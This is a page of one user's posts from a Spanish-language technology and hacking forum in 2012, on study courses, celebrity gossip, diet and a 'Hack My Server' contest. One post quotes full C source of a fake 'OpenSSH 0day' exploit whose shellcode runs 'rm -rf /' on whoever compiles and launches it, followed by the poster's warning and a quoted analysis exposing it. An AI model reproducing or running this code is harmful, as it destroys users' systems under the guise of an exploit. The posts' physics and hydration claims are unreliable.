últimos mensajes de: maxim_o

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23

161	Foros Generales / Foro Libre / Re: Qué curso de estos dos de FP os parece mejor?	en: 22 Mayo 2012, 21:19 pm
Cita de: skapunky en 22 Mayo 2012, 20:50 pm Yo veo mas interesante en lo personal: TÉCNICO SUPERIOR EN DESARROLLO DE APLICACIONES INFORMÁTICAS. pero te hablo como una opinión, no he cursado ningún ciclo. Lo que veo que hay pocas assignaturas...ya se coge nivel en programación? EN serio veo poca materia. EL de Tecnico superior en desarrollo de aplicaciones informáticas ya no existe o está en proceso de desaparicion.... Creo que ya no dejan matricularse a alumnos de primer ingreso.... De este han salido dos modalidades... DAM (Desarrollo aplicaciones multiplataformas) y DAW (Desarrollo aplicaciones Web).... El primer año es idéntico a ambos FPs y cambia el 2º año..... Supongo que a la hora de hacer uno u otro... Pues dependerá de cuál tenga más futuro / salidas profesional y/o que rama guste más

162	Foros Generales / Noticias / Re: El fundador de Facebook se casa con su novia Priscilla Chan	en: 22 Mayo 2012, 12:19 pm
Si se separan pase lo que pase le sacará cuartos.... Y se ha visto a muchos futbolistas , etc etc En el mejor de los casos habrá echo separacion de bienes.... (aunque igual despues de 9 años... y demas como el dinero no es tan problema para él igual ni se lo ha pensao... ) En este caso tendran un chiquillo y como salvo que la madre la lie mucho al separse se queda con la madre y tendra que pasarle una MUY BUENA PENSION por lo que acabará viviendo del cuento.... A eso sumale que si quiere podrá ir a entrevistas programas etc que le darán una buena pasta.... Y si no ha hecho separacion de bienes... Ya no le hace ni falta eso.... se lleva la mitad de todo XD Y asi es la ley.... Igual todas no son asi... Pero hay muchas "cazatalentos" por ahi que van a ver si pegan el braguetazo..... Ahora en este caso... si hay divorcio sacará dinero está claro... Aunque al menos al principio no parece que haya sido por dinero.... Se conocieron hace 9 años.... y hace tanto facebook no existía (creo).... Por lo que dinero tampoco tenia.... y si llevan desde entonces...... http://peru.com/2012/05/20/actualidad/internacionales/ella-priscilla-chan-esposa-mark-zuckerberg-noticia-65135 http://www.internetizado.com/11601/mark-zuckerberg-rompe-su-silencio-respecto-a-la-red-social/ http://www.lavozlibre.com/noticias/ampliar/128258/mark-zuckerberg-millonario-por-facebook-austero-en-su-vida

163	Foros Generales / Foro Libre / Re: Que pesa mas, 1kg de...	en: 22 Mayo 2012, 12:10 pm
Depende.... Si pesas aqui 1 kg de algodón y 1kg de plomo ... y ese 1kg de plomo lo mandas a jupiter, si que va a pesar mas por la gravedad.... ahora.... si el plomo lo coges y lo pesas en jupiter va a pesar lo mismo 1kg -1kg , pero si lo traes a la tierra pesara mas el algodon por que igual aqui ese mismo plomo pesa 100 gr. al ser menor la gravedad

164	Foros Generales / Foro Libre / Re: Condenado a un año y tres meses de prisión el torturador de dos cachorros en ...	en: 15 Mayo 2012, 18:05 pm
Puffff pobres cachorros..... Menudo Hijo de ..........

165	Programación / Programación C/C++ / Re: [Ayuda] Ejercicio en C	en: 14 Mayo 2012, 23:35 pm
Lo que has dado y nada es practicamente lo mismo.... Has dado el enunciado que te han dado los profesores y poco más.... Aqui la gente no esta para hacerte los deberes..... Empieza a codear , o hacer lo que tengas que hacer y ves pegandolo y te iran ayudando pero poniendo el enunciado solo no creo que mucha gente se moleste....

166	Sistemas Operativos / GNU/Linux / Re: ¿Cómo puedo hacer funcionar , la aceleración 3D , en Debian Squeeze?.	en: 13 Mayo 2012, 00:52 am
Mmmm Supongo que esto ya lo habrás mirao... Pero por si acaso... http://www.esdebian.org/wiki/graficas-ati

167	Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"	en: 10 Mayo 2012, 20:37 pm
MMMM pues no será se si será vuestro caso o no.... Pero en un post, dijo que ya no se daría a nadie más la ip, y la cuenta del plesk solo se la daría a la gente que le habia dado ip o algo asi.... Aunque no estoy muy seguro ya que se han llenado muchos post inservibles cuando dijo que las ip, cuentas del plesk o lo que fuera se pidieran POR PRIVADO. Si no contesta pueden pasar dos cosas.... 1.- QUe no se haya conectado... La gente aunque parezca mentira tiene vida aparte del foro... 2.- QUe de momento no de mas ips 3.- Ni idea... pero algun motivo tendrá Saludos!!

168	Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"	en: 8 Mayo 2012, 10:35 am
Cita de: m0rf en 8 Mayo 2012, 02:58 am Perdona pero de webs? Lo he sacado de aquí: http://www.securityfocus.com/bid/10976/exploit Yo no he compilado nada porque ya sabia que el exploit no funcionaria pero si creo que se podria modificar para que funcionara con otros sistemas operativos. Si buscas en este mismo foro hay dos temas que hablan de este exploit... Yo de ti buscaria sobre el exploit antes de cuestionar su procedencia. m0rf tio.... no iba por ti XDD te has molestado en leer el exploit que cite? y en ver la página que puse? XD No es el mismo que el que has puesto tu de security focus es el del sshd... Fíjate.... Saludos

169

Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"

en: 8 Mayo 2012, 00:36 am

Cita de: h1t en 7 Mayo 2012, 23:58 pm

He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.

Código:

/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }

Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.

Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.

MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....

http://www.tamonten.com/how-not-to-exploit-a-box
Ahi teneis una web donde hablan del exploit y de su análisis
Sacado de esa web de la explicación de ese exploit:

Citar

converting the shellcode to ascii:

docoder
j?X?Rj/??Rfh-f???Rfh-r??Rh//rmh/bin??RWVQS????

rootshell
1????ou!?Q?ck yQf?fufQ1???1???1?????1?1?@??

The only real strings I can pull out of that are in the decoder section. Namely "/","-f","-r","/rm","/bin"

Or to put it another way "/bin","/rm","-r","-f","/"

Those are not strings I want to see in code I'm running on my box

Luckily the pentester in question was saved by the fact that "rm -rf /" doesn't work on modern distros, but he was only a "--no-preserve-root" away from a dead box.

EDITO: Dimitrix, el usuario en el plesk te lo tenemos que pedir por privado, o nos lo iras mandando tú cuando este creado ?

170	Foros Generales / Foro Libre / Re: Dieta Dukan	en: 6 Mayo 2012, 15:12 pm
Cita de: corax en 6 Mayo 2012, 12:03 pm Le dijo al diabético antes de que éste sufriese una hipoglucemia nocturna. Una idea magnífica para una bajada de azúcar y todo lo que ello conlleva. Esto es cierto. Eso no lo es. Lo único que tiene de importante beber mucha agua es la hipopotasemia que puede dar. Eso sí es importante, pero en el mal sentido. El agua como todo, en su justa medida. Crees mal. Estamos hablando de una persona sana, sin problemas de diabetes etc No es cierto que si pierdes peso rapido tiendes a recuperarlo mas rapido aún(efecto rebote) Beber agua cuando haces dieta y ejercicio y quema de grasas es muy importante .... minimo 3l al dia....

Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [17] 18 19 20 21 22 23